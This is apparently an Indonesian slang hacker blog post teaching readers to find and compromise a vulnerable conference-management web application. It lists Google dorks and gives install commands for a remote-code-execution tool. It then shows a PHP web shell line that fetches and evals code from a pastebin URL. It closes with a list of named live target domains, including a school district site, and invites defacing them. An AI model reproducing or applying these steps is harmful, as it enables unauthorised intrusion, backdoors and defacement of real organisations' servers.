Yo wassap gaes :V
Sebenernya sih itu method dah lama ya anjg tapi gw coba tadi karna baca²
juga sih di blog temen + dari gogel ternyata masih banyak web yang
pulen(vuln) yang ezzz sangat buat di up shell + tebas peler nya xD
Udah ya anjg gk usah banyak bacod:)
Siapin dulu alat tempur nya xD
- Termux / Linux
- Dork Presh
- Rokok
- Face Gans
- Kuota anjg jan lupa !
Ok gan kalo dah siap semua langsung kita ekse aja😎
Pertama kita dorking dulu gan di gogel kalo perlu di deepweb anjg biar pro👊😎
Dork:
~ inurl:/brandUrl=http://
~ inurl:/signin.php?ret=http
~ +"Public" +"My Conferences" +"Personal Library" +"My Profile" +19.49.5200.0
Masukin dork di atas ke gogel :D
Gk paham? Tolol babi liat gambar di bawah anjg.
Nah kalo dah paham tinggal lu cari web vuln nya xD
Caranya? Ezzz banget dong pastinya :*
Kita install dulu tools rce nya.
Buka termux lu asw kalo ga punya donlod sendiri jan manja ! W hek modar lu anjg.
Ketik command nya :
$ pkg update && upgrade
$ pkg install python
$ pkg install wget
$ pkg install bash
$ git clone https://github.com/cacacr4ck/rce
$ ls
$ cd rce
$ sh install.sh
Udah ? Nah kalo udah cara cek web vuln nya kek gini :
Ketik : python rce.py http://sitetarget.com
Gk paham? Liat gambar anjg.
Nah sekarang cara biar tau web itu pulen atau ga gimana? Ezzz kalo udah lu klik enter bakalan ada tulisan pulen/tidak pulen kok xD
Kek gini nih kalo pulen.
Tinggal kita up shell deh xD
Caranya? Ketik :
$ echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/CurQrH1a")); ?>' > sel.php
Nah kalo bisa ke upload shell nya kek gini nih liat gambar anjg jan liat bokep.
Bakalan ada tulisan No Output.
Cara akses nya? Ezz sangatz http://sitetarget.com/scripts/namashellu.php
Jederrr memexxxx ke upload kan? XD
Terserah mau lu tebas index atau ngga :)
Live target? :
http://conference.jbhm.com
http://conference.crownquest.com
http://conference.longboatkey.org
http://conference.fveng.com
http://sa100.neenah.k12.wi.us





